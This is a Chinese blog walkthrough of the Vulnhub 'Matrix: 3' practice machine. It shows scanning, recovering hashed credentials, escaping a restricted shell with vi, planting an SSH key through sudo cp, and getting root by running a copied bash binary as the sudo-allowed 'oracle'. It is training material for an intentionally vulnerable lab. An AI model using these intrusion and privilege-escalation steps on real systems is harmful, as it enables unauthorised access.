Vulnhub--Matrix: 3

最新推荐文章于 2024-04-29 21:58:18 发布
最新推荐文章于 2024-04-29 21:58:18 发布
阅读量110 收藏
点赞数
文章标签: linux 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45168704/article/details/131210113
版权

0x01靶机介绍

项目Value
项目地址https://www.vulnhub.com/entry/matrix-3,326/
镜像链接https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova
作者Ajay Verma
发布日期2019年7月9日
系列Matrix
难度中等
目的获取root权限

0x02靶机搭建

工具:VirtualBox7.0
镜像:Machine_Matrix_v3.ova

搭建方式:

1.管理–>导入虚拟机–>Machine_Matrix_v3.ova–> Finish

2.设置–>显示–>VMSVGA
网络–>桥接–>混杂模式全部允许(并记下mac号)
在这里插入图片描述
在这里插入图片描述
3.开启我们的攻击机kali(和靶机一样桥接同一个网卡)和靶机

桥接网段:192.168.3.0/24
kali的IP地址:192.168.3.59

0x03渗透流程

一、信息收集

1.主机发现
arp-scan -l

在这里插入图片描述

2.查看端口发现端倪
nmap -sV -p- 192.168.3.236

在这里插入图片描述
7331端口:
在这里插入图片描述

80端口(这里致敬的黑客帝国,我们可以根据上面的英文信息定位到兔子线索):
在这里插入图片描述
在这里插入图片描述
f12查看图片信息,发现上面写着Matrix是敲门砖
在这里插入图片描述
我们访问

http://192.168.3.236/Matrix/

需要我们解密 正确的路径为:/Matrix/n/e/o/6/4/ (黑客帝国主角叫neo,作者为所在的组织名缩写为ud64)
在这里插入图片描述
存在一个秘密文件secret.gz,下载下来使用记事本打开,发现一个用户名和加密的密码
在这里插入图片描述

admin:76a2173be6393254e72ffa4d6df1030a

网页进行解密:passwd
在这里插入图片描述

二、漏洞分析和利用

1.ssh密码获取

我们进入7331端口,使用刚刚获取的用户名密码登陆,没有发现什么线索
在这里插入图片描述
使用dirb进行目录扫描

dirb http://192.168.3.236:7331 -u admin:passwd -w

在这里插入图片描述
这里存在一个data目录,我们访问下
在这里插入图片描述
下载了一个文件,具体干嘛的不知道,使用kali里的file查看一下这个文件发现为window执行文件

file data

在这里插入图片描述
这里需要使用反编译的工具进行反编译提取信息,我们直接参考做过的大佬提取的账户密码:guest/7R1n17yN30

远程ssh登陆

ssh guest@192.168.3.236 -p 6464

在这里插入图片描述
2.提权
列出当前可以执行的命令

compgen -c

在这里插入图片描述
我们使用vi命令进行绕过当前的低权限shell
先vi打开个空文件,然后esc输入

:!/bin/sh

在这里插入图片描述
得到一个sh终端
在这里插入图片描述
利用export修改环境变量,执行/usr/bin/bash拿到功能完全的bash shell终端。

export PATH="/usr/bin"

/usr/bin/bash

在这里插入图片描述
使用sudo -l查看可以用来提权的信息
在这里插入图片描述
可以看到trinity用户可以无密码执行/bin/cp 命令
我们使用ssh-keygen生成一个密钥,密码为空

ssh-keygen

在这里插入图片描述

然后把刚刚生成的密钥给给予777权限,再复制到trinity用户目录下就行了

chmod 777 .ssh/id_rsa.pub 
sudo -u trinity /bin/cp .ssh/id_rsa.pub  /home/trinity/.ssh/authorized_keys

在这里插入图片描述
使用trinity用户登陆密码123456

ssh trinity@127.0.0.1 -i .ssh/id_rsa -p 6464


sudo -l

查看当前用户可以不用密码就能以root身份执行triniry目录下的oracle
在这里插入图片描述
我们直接复制/usr/bin/bash 到/home/trinity下,并命名为oracle

cp /usr/bin/bash oracle
chmod +x oracle
sudo ./oracle

成功提权root
在这里插入图片描述
参考文章:https://cloud.tencent.com/developer/article/1472396

巴鸽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Calculate-Distance-Matrix:使用 csv 获取两个位置之间的距离或时间
08-04
git clone https://github.com/lucioerlan/calculate-distance-matrix.git$ cd calculate-distance-matrix/client -and- calculate-distance-matrix/server$ npm install 注意事项: 正确格式化 .csv 文件,在 /...
vulnhub靶场Matrix-Breakout 2 Morpheus教程
m0_73248913的博客
01-22 3850
蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847。此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件。下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来。
vulnhub靶机实战--Matrix:1
清唪的博客
04-13 3521
1.netdiscover 探测靶机ip地址 2.nmap -sS -A -p- +靶机ip 对靶机进行端口服务扫描 3.查看一下80端口网页发现并没有什么卵用 4.dirb http://+靶机ip 目录扫描 发现并没有什么卵用 5.我们上面的端口扫描有个31337端口可以尝试看看它有什么作用 我们来查看它的源代码 发现有base64 耶耶耶~~ 可以解码了 echo “ZWNobyAiVGhlbiB5b3UnbGwgc2VlL...
vulnhub靶机实战——Matrix_1
冠霖L的博客
10-31 1051
环境:Vmware 15 Kali:192.168.150.129 Matrix靶机:192.168.150.130 1、 发现主机 Matrix靶机、Kali添加至“仅主机模式”,查看Kali的IP地址为:192.168.150.129 使用nmap扫描192.168.150.0/24网段发现靶机IP地址:192.168.150.130 nmap -sP 192.168.150.0/24 -oN...
storybook-addon-matrix:故事书插件,用于通过道具矩阵渲染组件
02-03
npm i storybook-addon-matrix 查看演示: :用法全球范围// .storybook/preview.jsimport { addDecorator } from '@storybook/react' ;import { withMatrix } from 'storybook-addon-matrix' ;addDecorator ( ...
chartjs-chart-matrix:Chart.js模块,用于创建矩阵图
05-12
chartjs-chart-matrix v3.0.0模块,用于创建矩阵图文献资料为了创建一个矩阵图,包括chartjs-chart-matrix.js后chart.js ,然后由设置创建图表type属性'matrix' const chart = new Chart ( ctx , { type : 'matrix' ...
go-rpi-rgb-led-matrix:绑定rpi-rgb-led-matrix一个出色的C ++库,可通过Raspberry Pi GPIO控制RGB LED显示
02-05
该库包括直接控制de LED Matrix的基本绑定,以及具有更多高级功能的便捷 。 还包括一些来测试库和配置。 结构实现了Go标准库中的接口。 这使得与矩阵的交互像在Go中处理普通图像一样简单,从而允许使用围绕image....
rpi-rgb-led-matrix:使用Raspberry Pi GPIO控制多达三个链的64x64、32x32、16x32或类似的RGB LED显示器
02-05
在Raspberry Pi 2或3上,您可以轻松地在该链中链接12块面板(因此总共36块面板),但是理论上您可以将其拉伸到多达96块面板(链长为32),并且仍然可以达到100Hz左右的刷新率。完整的24位彩色(理论上-从未测试过此...
13 Linux实操篇-网络配置
qq_74289024的博客
04-23 1044
子网ip 与网关。
Linux多进程(五) 进程池 C++实现
Lyajpunov的博客
04-26 800
进程池是一种并发编程模式,用于管理和重用多个处理任务的进程。它通常用于需要频繁创建和销毁进程的情况,以避免因此产生的开销。减少进程创建销毁的开销:避免频繁创建和销毁进程所带来的系统资源开销。提高系统响应速度:由于进程已经初始化并且一直保持在内存中,可以立即分配执行任务,减少了任务等待时间。控制资源使用:通过限制进程池中的进程数量,可以控制系统资源的使用情况,避免资源过度消耗。
Linux——web服务配置
Xinan_____的博客
04-23 1130
GET:请求获取指定资源的表示形式。使用GET方法,客户端请求服务器发送某个资源。POST:向指定资源提交数据,用于处理表单提交、文件上传等操作。PUT:向指定资源位置上传其最新内容,用于更新资源。DELETE:请求服务器删除指定资源。HEAD:请求获取与实体相对应的头部信息,用于获取资源的元数据。OPTIONS:请求查询服务器支持的HTTP方法。TRACE:请求服务器回显收到的请求消息,用于测试或诊断。200 OK:请求成功。:永久重定向,请求的资源已经被分配了新的。
Linux:浏览器访问网站的基本流程(优先级从先到后)
fox_kang的博客
04-28 605
浏览器访问网站的基本流程(优先级从先到后) 首先查找浏览器是否存在该网站的访问缓存 其次查找本机的域名解析服务器 windows:C:\Windows\System32\drivers\etc\hosts Linux:/etc/hosts 使用外部的域名解析服务器解析(例如:114.114.114.114) 第一步:浏览器使用域名访问www.bilibili.com.网站 第二步:首先去访问根域名解析服务器查询,根服务器返回.com域名解析服务器地址==(这里的根域名解析服务器不会直接给出域名对应的
Linux 抽象命名空间(Abstract Namespace)简介
日拱一卒,玉汝于成
04-25 584
与传统的 UDS 不同,抽象命名空间并不在文件系统中创建实际文件,而是仅存在于内核内存中,其名称以 localabstract: 作为前缀。在这个例子中,我们创建了一个名为 my_abstract_namespace 的抽象命名空间,并将其绑定到了刚创建的 Unix 套接字上。要在 Linux 系统中生成一个抽象命名空间,通常需要使用编程语言的套接字 API 来创建一个 Unix 域套接字,并将其绑定到一个以 localabstract: 开头的特殊路径。
arm架构Linux5.0内核连接脚本文件vmlinux.lds.S分析
jianjian的博客
04-23 980
vmlinux.lds.S 是 Linux 内核中用于链接的脚本文件,用于定义内核对象文件的内存布局,即它告诉链接器如何将不同的内核代码段和数据段组合成一个最终的内核映像 vmlinux。编译内核源码生成内核文件的过程分两步,一个是“编译”,另一个是“链接”的过程,vmlinux.lds.S要做的就是告诉编译器如何链接编译好的各个内核.o文件,从而生成vmlinux文件。
linux的“>”和“>>”
qq_45212655的博客
04-24 460
文件存在,新的输出将被添加到文件的内容之后;如果文件不存在,将会创建一个新文件。文件存在,它的内容将被新的输出覆盖;如果文件不存在,将会创建一个新文件。都是用于文件重定向的操作符,它们用于将命令的输出发送到文件中。用于创建一个新文件或覆盖现有文件的内容。用于将输出附加到现有文件的末尾,而不是覆盖它。
Linux中的YUM源仓库和NFS文件共享服务
最新发布
2402_83805984的博客
04-29 442
yum是一个基于RPM包(是Red-Hat Package Manager红帽软件包管理器的缩写)构建的软件更新机制,能够自动解决软件包之间的依赖关系=,解决了日常工作中的大量查找安装依赖包的时间。NFS是一种基于TCP/IP传输的网络文件系统协议,最初由sun公司开发,通过NFS协议。客户机可以向访问本地目录一样访问远程NFS服务器中的共享资源。NFS也是NAS存储设备必然支持的一种协议,但是因为没有用户认证机制,而且数据在网络上明文传输、安全性很差,所以一般只能在局域网中使用。
Linux--内核移植(二)移植流程及驱动修改
qq_47258284的博客
04-23 1057
一、官方开发板内核测试本文来总结一下如何将 NXP官方提供的Linux内核移植到正点原子的开发板上。一、官方开发板内核测试NXP提供的Linux源码肯定是可以在自己的开发板上运行下去的,所以我们肯定是以 I.MX6ULL EVK开发板为参考,然后将Linux内核移植到开发板上的。1.修改顶层Makefile修改顶层Makefile,直接在顶层Makefile文件里面定义ARCH和这两个的变量值为 arm和 arm-linux-gnueabihf-。
# rbind() & cbind() functions ------------------ x <- c(1,5,2); y <- matrix(1:6,2,3) rbind(x,y) x <- NULL; y <- c(1,5,2) rbind(x,y) x <- matrix(1:6,3,2) y <- matrix(9:1,3,3) cbind(x,y) # Transformation into vector or matrix --------- A <- matrix(1:6,2,3) x <- A[1,]; x is.vector(x) x <- as.matrix(x); x x <- as.vector(x); x A <- array(0,dim=c(2,2,2)) as.vector(A) as.matrix(A) # Names of matrix rows and columns ------------- A <- matrix(1:6,2,3); A rownames(A) <- c('K','J') colnames(A) <- 3:1 A['J',] A[,'3']
06-09
使用 as.vector() 和 as.matrix() 函数可以将向量或数组转换为矩阵或数组,或将矩阵或数组转换为向量。例如,使用 as.vector() 函数将一个矩阵转换为一个向量。 使用 rownames() 和 colnames() 函数可以为矩阵的行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值